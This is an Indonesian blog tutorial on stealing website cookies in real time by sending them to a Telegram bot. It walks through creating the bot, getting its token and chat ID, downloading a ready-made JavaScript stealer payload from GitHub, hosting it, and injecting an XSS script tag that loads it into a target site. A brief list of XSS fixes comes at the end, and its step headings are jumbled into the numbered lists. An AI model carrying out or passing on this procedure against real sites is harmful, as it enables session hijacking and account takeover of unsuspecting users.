Pada kali ini saya akan membahas bagaimana cara mencuri cookie dengan telegram. Tujuannya adalah mendapatkan cookie secara realtime.
Pertama Siapkan Bot Telegramnya
Hasil
1.Buka Telegram andaKedua Cari Chat ID
2.Klik icon cari di pojok kanan atas
3.Cari Telegram @BotFather
4.Tulis /start atau klik start
5.Tulis Nama Bot Kalian. Contoh BotAdeGanteng
6.Tulis username bot. Contoh Adeganteng_bot
7.Anda akan mendapat Token Bot
1.Buka Telegram andaKetiga Konfigurasikan Chat ID dan Token Bot Pada JS Payload
2.Klik icon cari di pojok kanan atas
3.Cari Telegram @get_id_bot
4.Tulis /start atau klik start
5.Anda akan dapat Chat ID
1.Download Payload Di https://raw.githubusercontent.com/Adelittle/TeleXA/master/telexa.js
2.Isikan Token Bot pada var tokenBot dan Chat ID pada var chatId
3.Upload Js payload pada web anda
4.Masukkan Xss Pada Target dengan payload
"><script src="http://webanda.co/telexa.js"></script>
Hasil
Beberapa cara memperbaiki celah xss adalah sebagai berikut:
-Menggunakan htmlspesialchars
-Menggunakan htmlentities
-Memasang Header X-Xss-Protection
-Menerapkan cookie http Only
Kesimpulan
Cookie dapat digunakan untuk mengambil sesi user pada sebuah web apps, paduan antara exploit xss dan telegram daoat membuat kegiatan stealing cookie lebih realtime, yang mana artinya cookie bisa didapatkan sebelum kedaluarsa. Baik sebagai user ataupun programmer sebaiknya memperhatikan url yang diberikan dan mengevaluasi beberapa fitur pada webnya. Walaupun xss dikenaln sebagai coomon vulnerability tapi dampak yang dihasilkan perlu diperhitungkan
Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.
Terimakasih dan semoga bermanfaat :)